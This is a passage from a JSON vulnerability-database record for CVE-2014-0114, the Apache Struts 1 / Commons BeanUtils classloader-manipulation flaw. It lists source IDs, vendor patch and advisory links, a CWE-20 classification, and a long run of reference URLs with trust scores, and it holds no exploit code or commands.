"id": "126692"
},
{
"db": "PACKETSTORM",
"id": "149050"
},
{
"db": "PACKETSTORM",
"id": "127868"
},
{
"db": "PACKETSTORM",
"id": "137980"
},
{
"db": "PACKETSTORM",
"id": "154792"
},
{
"db": "PACKETSTORM",
"id": "128873"
},
{
"db": "PACKETSTORM",
"id": "139721"
},
{
"db": "PACKETSTORM",
"id": "126455"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
},
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"id": "VAR-201404-0288",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.4253262875
},
"last_update_date": "2024-11-29T21:26:04.405000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "struts-1.2.9-4jpp.8.el5_10.src",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743"
},
{
"title": "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20192995 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=96f4091aa31a0ece729fdcb110066df5"
},
{
"title": "Red Hat: CVE-2014-0114",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2014-0114"
},
{
"title": "Red Hat: Important: Fuse 7.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20182669 - Security Advisory"
},
{
"title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f5bb2b180c7c77e5a02747a1f31830d9"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
},
{
"title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
},
{
"title": "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=68c6989b84f14aaac220c13b754c7702"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "struts1-patch",
"trust": 0.1,
"url": "https://github.com/ricedu/struts1-patch "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/weblegacy/struts1 "
},
{
"title": "struts1filter",
"trust": 0.1,
"url": "https://github.com/rgielen/struts1filter "
},
{
"title": "StrutsExample",
"trust": 0.1,
"url": "https://github.com/vikasvns2000/StrutsExample "
},
{
"title": "struts-mini",
"trust": 0.1,
"url": "https://github.com/bingcai/struts-mini "
},
{
"title": "strutt-cve-2014-0114",
"trust": 0.1,
"url": "https://github.com/anob3it/strutt-cve-2014-0114 "
},
{
"title": "super-pom",
"trust": 0.1,
"url": "https://github.com/ian4hu/super-pom "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2014-0114"
},
{
"db": "CNNVD",
"id": "CNNVD-201404-581"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-0114"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://www.securityfocus.com/bid/67121"
},
{
"trust": 2.5,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
},
{
"trust": 2.2,
"url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
},
{
"trust": 2.2,
"url": "http://www.debian.org/security/2014/dsa-2940"
},
{
"trust": 2.2,
"url": "http://www.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042296"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
},
{
"trust": 1.9,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
},
{
"trust": 1.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676303"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675266"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677110"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675689"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674812"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674128"
},
{
"trust": 1.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675972"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2018:2669"
},
{
"trust": 1.7,
"url": "http://advisories.mageia.org/mgasa-2014-0219.html"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/201607-09"
},
{
"trust": 1.7,
"url": "https://access.redhat.com/errata/rhsa-2019:2995"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/06/15/10"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://issues.apache.org/jira/browse/beanutils-463"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/57477"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675898"
},
{
"trust": 1.6,
"url": "http://openwall.com/lists/oss-security/2014/07/08/1"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20140911-0001/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59430"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2014/dec/23"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58851"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59704"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59480"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59246"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59245"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59479"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59118"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58947"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1091938"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59014"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1116665"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/58710"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.6,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59464"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140119284401582\u0026w=2"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=141451023707502\u0026w=2"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59228"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676931"
},
{
"trust": 1.6,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60177"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/60703"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/59718"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://marc.info/?l=bugtraq\u0026m=140801096002766\u0026w=2"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20180629-0006/"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/solutions/869353"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.6,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"trust": 1.6,
"url": "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e"
},
{
"trust": 1.2,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0497.html"
},
{
"trust": 1.0,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0498.html"
},
{
"trust": 1.0,
"url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
},
{
"trust": 1.0,
"url": "http://struts.apache.org/release/2.3.x/docs/s2-021.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-0114"
},
{
"trust": 0.9,
"url": "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation"
},
{
"trust": 0.9,
"url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674435"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674428"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674937"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675822"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673663"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672316"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676375"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673098"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673944"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673101"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728"
},
{
"trust": 0.9,
"url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680848"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676646"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042186"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042185"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg27042184"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037507"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
},
{
"trust": 0.9,
"url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037825"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037409"
},
{
"trust": 0.9,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037506"
},
{
"trust": 0.9,
"url": "https://rhn.redhat.com/errata/rhsa-2014-0500.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673757"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673508"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673695"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674099"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674104"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673992"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674110"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673982"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673422"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680716"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21675387"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677802"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674310"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674191"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674017"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674016"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674339"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677449"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675496"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676485"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21677298"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674613"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673878"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673877"
},
{
"trust": 0.9,
"url": "https://www-304.ibm.com/support/docview.wss?uid=swg21674113"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674905"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21679331"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680698"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037424"
},
{
"trust": 0.9,
"url": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680194"
},
{
"trust": 0.9,
"url": "http://jvn.jp/en/jp/jvn30962312/index.html"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677352"
},
{
"trust": 0.9,
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037622"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86@%3cdev.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f@%3cnotifications.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3csolr-user.lucene.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0@%3cissues.commons.apache.org%3e"
},
{
"trust": 0.6,
